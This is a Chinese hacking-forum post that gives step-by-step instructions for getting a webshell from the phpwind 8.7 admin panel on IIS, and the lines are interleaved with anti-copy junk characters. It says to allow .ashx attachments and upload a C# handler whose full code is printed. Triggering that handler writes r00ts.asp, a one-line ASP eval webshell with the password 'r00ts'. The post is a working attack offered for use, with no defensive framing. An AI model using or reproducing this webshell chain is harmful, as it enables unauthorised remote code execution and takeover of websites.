找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2631|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
% z) v. c; n/ S
; _0 h* c: o+ j* W: z群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
. W$ W; n" d2 c " w# ]" c, `: h% H0 }
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整, H  g  p: O9 J6 A7 o( Z8 G0 m) ~
7 {7 A/ d1 y% v5 g7 N. l" h( P, d
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx3 L2 F. w1 C  ?
1 c$ K1 }6 `0 U" C
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts! |9 G, W; w9 I! n# w4 V5 s& j; P0 @  m
1 w, d1 y* l) ^2 v2 D' m  x" T1 ~% U
下面是代码:" G! F, }4 L; M7 z$ U& V
! v6 a' e( k& g! {, \
<%@ WebHandler Language="C#"Class="Handler" %>' `( k! k" J( E- _- w& L
using System;! |: S# U3 I7 Q' k$ H
using System.Web;/ T3 ?3 g; \4 J3 A" x
using System.IO;( |/ k  _8 b3 b2 N* P9 e
public class Handler : IHttpHandler {1 h$ ~, l' ?, D& P% W% N
public void ProcessRequest (HttpContext context) {
2 p3 c! ~& W+ s; u7 `5 s* H# ccontext.Response.ContentType = "text/plain";8 ~: p4 w  I' X6 G
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));, j& M9 G' C5 P
file1.Write("<%eval request(\"r00ts\")%>");
; f/ g5 E6 a- F' U& s6 B% nfile1.Flush();
( a: o. p' l' {9 S9 sfile1.Close();
; F+ A' s. N# [0 E7 T4 X}; c$ @# u  W% x+ b
public bool IsReusable {0 H7 M2 ]; b6 m( u% w# |; I/ Z" C
get {* M/ d, s  `9 a- z
return false;
& }" H, f) p! f}" W3 v- g) f: ^* Q6 K# F
}
, I/ [2 V  L1 u}8 a1 S! ^8 h- z* H- w& b. R3 L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表